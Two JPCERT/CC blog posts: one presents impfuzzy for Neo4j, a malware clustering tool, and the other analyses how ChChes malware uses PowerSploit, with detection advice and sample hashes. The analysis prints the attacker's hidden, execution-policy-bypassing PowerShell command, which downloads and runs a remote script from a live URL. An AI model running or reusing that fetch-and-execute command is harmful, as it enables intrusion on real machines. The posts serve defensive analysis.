Mar 23, 2017

Malware Clustering using impfuzzy and Network Analysis - impfuzzy for Neo4j -

Hi again, this is Shusei Tomonaga from the Analysis Center.

This entry introduces a malware clustering tool “impfuzzy for Neo4j” developed by JPCERT/CC.

Overview of impfuzzy for Neo4j

impfuzzy for Neo4j is a tool to visualise the results of malware clustering using a graph database, Neo4j. A graph database handles data structured as records (nodes) and the relations among those records. Neo4j provides functions to visualise registered nodes and relations as a graph.

impfuzzy for Neo4j operates in the following sequence:

  1. Calculate the similarity of malware using impfuzzy
  2. Generate a graph (network) based on the similarity
  3. Conduct network analysis over the graph (clustering)
  4. Register and visualise the clustering results on Neo4j database

First, the tool calculates the similarity of malware using impfuzzy, a technique that estimates the similarity of Windows executables based on a hash value generated from the Import API. impfuzzy was introduced in an earlier article on this blog, so please refer to it for further details.

After that, a graph is generated by connecting nodes that were judged to be similar based on the impfuzzy results. The graph is then analysed using the Louvain method [1], a method for clustering network graphs that is known for being fast compared with other algorithms. With this analysis, malware is automatically classified into groups.
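The graph-building step can be sketched in a few lines of Python. This is only an illustration under assumptions: the sample names, scores and the threshold of 30 are made up, and the code does not run the Louvain method itself (the tool uses pylouvain.py for that). It only computes modularity, the quantity that the Louvain method tries to maximise, for two candidate groupings.

```python
# Hypothetical pairwise similarity scores (0-100), standing in for the
# values impfuzzy would report for each pair of samples.
SCORES = {
    ("a.exe", "b.exe"): 95,
    ("a.exe", "c.exe"): 90,
    ("b.exe", "c.exe"): 88,
    ("d.exe", "e.exe"): 92,
    ("c.exe", "d.exe"): 10,
}

THRESHOLD = 30  # assumed cut-off for "similar"; not taken from the tool


def build_edges(scores, threshold):
    """Keep only the pairs whose similarity reaches the threshold."""
    return {pair: s for pair, s in scores.items() if s >= threshold}


def modularity(edges, community):
    """Weighted modularity of a partition given as node -> group label."""
    total = sum(edges.values())  # total edge weight of the graph
    if total == 0:
        return 0.0
    inside = {}      # edge weight that stays inside each group
    degree_sum = {}  # sum of weighted node degrees per group
    for (u, v), w in edges.items():
        for node in (u, v):
            c = community[node]
            degree_sum[c] = degree_sum.get(c, 0) + w
        if community[u] == community[v]:
            c = community[u]
            inside[c] = inside.get(c, 0) + w
    return sum(
        inside.get(c, 0) / total - (degree_sum[c] / (2 * total)) ** 2
        for c in degree_sum
    )


edges = build_edges(SCORES, THRESHOLD)
two_groups = {"a.exe": 0, "b.exe": 0, "c.exe": 0, "d.exe": 1, "e.exe": 1}
one_group = {name: 0 for name in two_groups}

# Splitting the samples into two groups scores higher than one big group.
print(modularity(edges, two_groups) > modularity(edges, one_group))  # True
```

The weak link between c.exe and d.exe is dropped by the threshold, so the graph falls into two tightly connected parts, and the two-group partition receives the higher modularity.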

Finally, information on the analysed malware and its groups is registered in the Neo4j database.

Figure 1 shows the clustering result of Emdivi malware using impfuzzy for Neo4j.

Figure 1: Clustering result of Emdivi by impfuzzy for Neo4j

In this graph, malware samples (pink nodes) that are judged to be similar are connected with lines. The visualisation makes it clear that there are several groups of highly similar variants.

Since impfuzzy for Neo4j automatically clusters related samples through network analysis, it is possible to extract samples that belong to a specific group. Figure 2 visualises the relationship of a specific group from the example in Figure 1. The numbers on the grey lines (grey edges) between samples indicate the similarity of the malware in the range from 0 to 100 (the higher the number is, the more similar the samples are).

Figure 2: Visualisation results of samples belonging to a specific group

How to obtain and use impfuzzy for Neo4j

The tool is available on GitHub. Please refer to the following webpage:

JPCERTCC/aa-tools GitHub - impfuzzy for Neo4j


Here are the instructions for using impfuzzy for Neo4j.

1. Obtain and install Neo4j community edition

Download Neo4j community edition from the following webpage and install it:


2. Download impfuzzy_for_neo4j.py

From the following webpage:


3. Install the software required for executing impfuzzy_for_neo4j.py

  • Install Python module pyimpfuzzy
$ pip install pyimpfuzzy

For more information on the install procedures, please see:


  • Install Python module py2neo v3
$ pip install py2neo

For more information on the install procedures, please see:


  • Download Python script pylouvain.py from the following webpage and save it to the same folder as impfuzzy_for_neo4j.py


4. Run Neo4j

Start Neo4j from the GUI or the command line.

5. Configure a password for Neo4j in impfuzzy_for_neo4j.py

Configure the login password for Neo4j in impfuzzy_for_neo4j.py (change the {password} below).

NEO4J_PASSWORD = "{password}"
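If you would rather not keep the password in the script, one possible variation is to read it from an environment variable. This is a sketch only: the environment variable name and the helper load_password are assumptions made for illustration and are not part of impfuzzy_for_neo4j.py.

```python
import os


def load_password(env=os.environ, default="{password}"):
    """Return the Neo4j password from the environment, else the placeholder.

    The variable name NEO4J_PASSWORD is an assumption for this sketch.
    """
    return env.get("NEO4J_PASSWORD", default)


NEO4J_PASSWORD = load_password()
```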

How to use impfuzzy for Neo4j

To use impfuzzy for Neo4j, specify the malware to cluster with one of the following options.

  • -f - Specify malware (a file)
  • -d - Specify a folder where malware is stored
  • -l - Specify a CSV file(*) which lists malware

(*) Each line of the CSV file has the following format:

File name, impfuzzy hash value, MD5 hash value, SHA1 hash value, SHA256 hash value
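As an illustration of this format, the following Python sketch reads such a list into named records. It assumes one sample per line, no header row, and optional spaces after the commas; the demo line is made up (its impfuzzy value is a placeholder, not a real hash), and the names Sample and read_sample_list are ours.

```python
import csv
import hashlib
import io
from collections import namedtuple

# Field order follows the format line above.
Sample = namedtuple("Sample", "name impfuzzy md5 sha1 sha256")


def read_sample_list(handle):
    """Parse a CSV list of samples from an open text file."""
    samples = []
    for row in csv.reader(handle, skipinitialspace=True):
        if not row:  # skip blank lines
            continue
        if len(row) != 5:
            raise ValueError("expected 5 fields, got %d: %r" % (len(row), row))
        samples.append(Sample(*(field.strip() for field in row)))
    return samples


# Made-up demo line; the hashes are computed from dummy bytes.
payload = b"demo"
demo_line = ", ".join([
    "sample.exe",
    "3:abc:def",  # placeholder, not a real impfuzzy hash
    hashlib.md5(payload).hexdigest(),
    hashlib.sha1(payload).hexdigest(),
    hashlib.sha256(payload).hexdigest(),
])
samples = read_sample_list(io.StringIO(demo_line + "\n"))
print(samples[0].name, samples[0].impfuzzy)
```

Rejecting rows with the wrong number of fields makes a malformed list fail early instead of producing shifted columns.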

In the following example, malware is stored in the folder ‘Emdivi’ which is passed as a parameter.

Figure 3: impfuzzy for Neo4j execution result

Clustering results are registered in the Neo4j database and can be visualised through the Neo4j web interface, which is accessible from the URL below (the following is an example for Neo4j installed in a local environment).


For visualising a graph of clustering results, a Cypher query (a command to operate Neo4j database) needs to be executed through the web interface. Figure 4 is an example of executing a Cypher query through the web interface.

Figure 4: Example of Cypher query execution

The Cypher query to execute depends on which clustering results you would like to visualise. Below are example queries for different cases.

[Example 1] Visualise all clustering results (Figure 1 is the result of the following Cypher query)

MATCH (m:Malware) RETURN m

[Example 2] Visualise a group of samples with a specific MD5 hash value (Figure 2 is an example of the following Cypher query)

MATCH (m1:Malware) WHERE m1.md5 = "[MD5 hash value]"
MATCH (m2:Malware) WHERE m2.cluster = m1.cluster
RETURN m2


[Example 3] Visualise all clustering results with impfuzzy similarity level over 90

MATCH (m:Malware)-[s:same]-() WHERE s.value > 90 RETURN m,s
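When trying several similarity levels, it can help to generate the query text rather than edit it by hand. The sketch below is a small Python helper of our own (query_all and query_similar are hypothetical names, not part of the tool) that builds the queries of Examples 1 and 3 and rejects values outside the 0 to 100 range used by impfuzzy. The resulting string is meant to be pasted into the Neo4j web interface.

```python
def query_all():
    """Cypher query of Example 1: every registered sample."""
    return "MATCH (m:Malware) RETURN m"


def query_similar(min_value):
    """Cypher query of Example 3 with an adjustable similarity level."""
    if isinstance(min_value, bool) or not isinstance(min_value, int):
        raise TypeError("similarity level must be an integer")
    if not 0 <= min_value <= 100:
        raise ValueError("similarity level must be between 0 and 100")
    return (
        "MATCH (m:Malware)-[s:same]-() "
        "WHERE s.value > %d RETURN m,s" % min_value
    )


print(query_similar(90))
```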


In malware analysis, it is crucial to quickly cluster a large amount of malware and single out the unknown types that need to be analysed. We hope that impfuzzy for Neo4j will help with such tasks.

In a future entry, we will introduce the clustering and analysis results that we obtained with this tool.

- Shusei Tomonaga

(Translated by Yukako Uchida)


[1] The Louvain method for community detection in large networks



Mar 01, 2017

Malware Leveraging PowerSploit

Hi again, this is Shusei Tomonaga from the Analysis Center.

In this article, I’d like to share our finding that ChChes (which we introduced in a previous article) leverages PowerSploit [1], an open source tool, for infection.

Flow of ChChes Infection

The samples that JPCERT/CC confirmed this time infect machines by leveraging shortcut files. The flow of events from a victim opening the shortcut file until a machine is infected is illustrated in Figure 1.

Figure 1: Flow of events from opening a shortcut file to ChChes infection

When the shortcut file is opened, a file containing PowerShell script is downloaded from an external server and then executed. Next, ChChes code (version 1.6.4) contained in the PowerShell script is injected into powershell.exe and executed. The detailed behaviour in each phase is described below.

Behaviour after the shortcut file is opened

When the shortcut file is opened, the following PowerShell script contained in the file is executed.

powershell.exe -nop -w hidden -exec bypass  -enc JAAyAD0AJwAtAG4Abw ~omitted~

The PowerShell script after “-enc” is Base64-encoded. Below is the decoded script:

$2='-nop -w hidden -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString(''https://goo.gl/cpT1NW'')"';if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2";}else{iex "& powershell $2";}
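The decoding can be reproduced with a few lines of Python. PowerShell expects the argument of “-enc” to be Base64 of the command text in UTF-16LE, so the sketch below reverses exactly that. Since the encoded string is truncated in this article, the example only decodes its first 16 characters; the function names are ours.

```python
import base64


def decode_encoded_command(b64_text):
    """Decode the argument passed to PowerShell's -enc option."""
    return base64.b64decode(b64_text).decode("utf-16-le")


def encode_command(script):
    """Inverse operation, handy for testing the decoder."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# First 16 characters of the encoded string quoted in the command line above.
prefix = "JAAyAD0AJwAtAG4A"
print(decode_encoded_command(prefix))  # $2='-n
```

The output matches the beginning of the decoded script. Note that a cut taken at an arbitrary position may not decode, because the fragment has to be a multiple of four Base64 characters and contain an even number of bytes.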

By executing the above PowerShell script, a file containing PowerShell script is downloaded from a specified URL. When the script runs in a 64-bit process ([IntPtr]::Size equals 8), it launches the 32-bit powershell.exe (syswow64\WindowsPowerShell\v1.0\powershell), so the downloaded script is always loaded and executed in 32-bit PowerShell. The likely reason is that the ChChes assembly code contained in the PowerShell script is not compatible with 64-bit environments.


Details of the Downloaded PowerShell Script

The downloaded PowerShell script is partially copied from PowerSploit (Invoke-Shellcode.ps1). PowerSploit is a tool to execute files and commands on a remote host and is used for penetration tests.

When the downloaded PowerShell script is executed, it creates document files based on data contained in the script, stores the files in the %TEMP% folder and displays them. We’ve seen different types of documents shown, including Excel and Word documents.


Next, the ChChes code contained in the PowerShell script is injected into powershell.exe. The injected ChChes receives commands and modules from C2 servers as explained in the previous blog post. The PowerShell script and the injected ChChes are not saved as files on the infected machine, and ChChes itself exists only in memory.

Figure 2 shows part of the PowerShell script.

Figure 2: Downloaded PowerShell script

Confirming Attack Traces through Event Logs

In environments where PowerShell v5.0 is installed (including Windows 10), PowerShell scripts downloaded from remote servers are recorded in the event logs under the default settings (as shown in Figure 3). When you investigate, please check whether your logs contain such records.

Figure 3: Contents recorded in Event Logs

Such logs can also be obtained in PowerShell v4.0 (the default version in Windows 8.1) by enabling the following Group Policy.

  • Computer Configuration -> Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging
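Once such logs are available, a first pass over them can be automated. The following Python sketch assumes the log records have been exported as plain text and searches each record for strings that appear in the commands quoted in this article. The indicator list and the function name find_indicators are our own choices for illustration; they are neither complete nor free of false positives.

```python
import re

# Assumed indicators, all taken from the command lines quoted in this article.
INDICATORS = {
    "download_string": re.compile(r"DownloadString", re.I),
    "encoded_command": re.compile(r"-enc(odedcommand)?\b", re.I),
    "hidden_window": re.compile(r"-w\s+hidden", re.I),
    "invoke_expression": re.compile(r"\bIEX\b", re.I),
    "policy_bypass": re.compile(r"-exec\s+bypass", re.I),
}


def find_indicators(record):
    """Return the sorted names of all indicators found in one log record."""
    return sorted(
        name for name, pattern in INDICATORS.items() if pattern.search(record)
    )


record = "powershell.exe -nop -w hidden -exec bypass  -enc JAAyAD0AJwAtAG4Abw"
print(find_indicators(record))
```

A record that matches several indicators at once, as the shortcut's command line does, is a good candidate for manual review.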


PowerShell scripts are now commonly leveraged in attacks. If your event log configuration is not set to record PowerShell execution, we recommend that you revise the settings in preparation for such attacks. Also, if you are not using PowerShell, we suggest restricting its execution with AppLocker or a similar mechanism.

- Shusei Tomonaga

(Translated by Yukako Uchida)


[1] PowerSploit


Appendix A: SHA-256 Hash Values of the samples


  • 4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297
  • 75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f
  • ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86
  • 646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543
  • 3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03
  • 9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d
  • 723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48
  • f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b
  • 471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856
  • aef976b95a8d0f0fdcfe1db73d5e0ace2c748627c1da645be711d15797c5df38
  • dbefa21d3391683d7cc29487e9cd065be188da228180ab501c34f0e3ec2d7dfc
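To check files against this list, a short Python sketch such as the following may be used. It only includes the first two hash values from the list above, to be extended with the rest, and the function names are ours. The demo at the end uses dummy bytes rather than a real sample.

```python
import hashlib
import io

# First two entries of Appendix A; add the remaining values as needed.
KNOWN_SHA256 = {
    "4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297",
    "75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f",
}


def sha256_of(handle, chunk_size=65536):
    """Compute the SHA-256 of a binary file object, reading it in chunks."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: handle.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def is_known_sample(handle, known=KNOWN_SHA256):
    """Return True if the file's SHA-256 is in the set of known values."""
    return sha256_of(handle) in known


# Demo with dummy bytes; for a real file use open(path, "rb") instead.
print(is_known_sample(io.BytesIO(b"not a sample")))
```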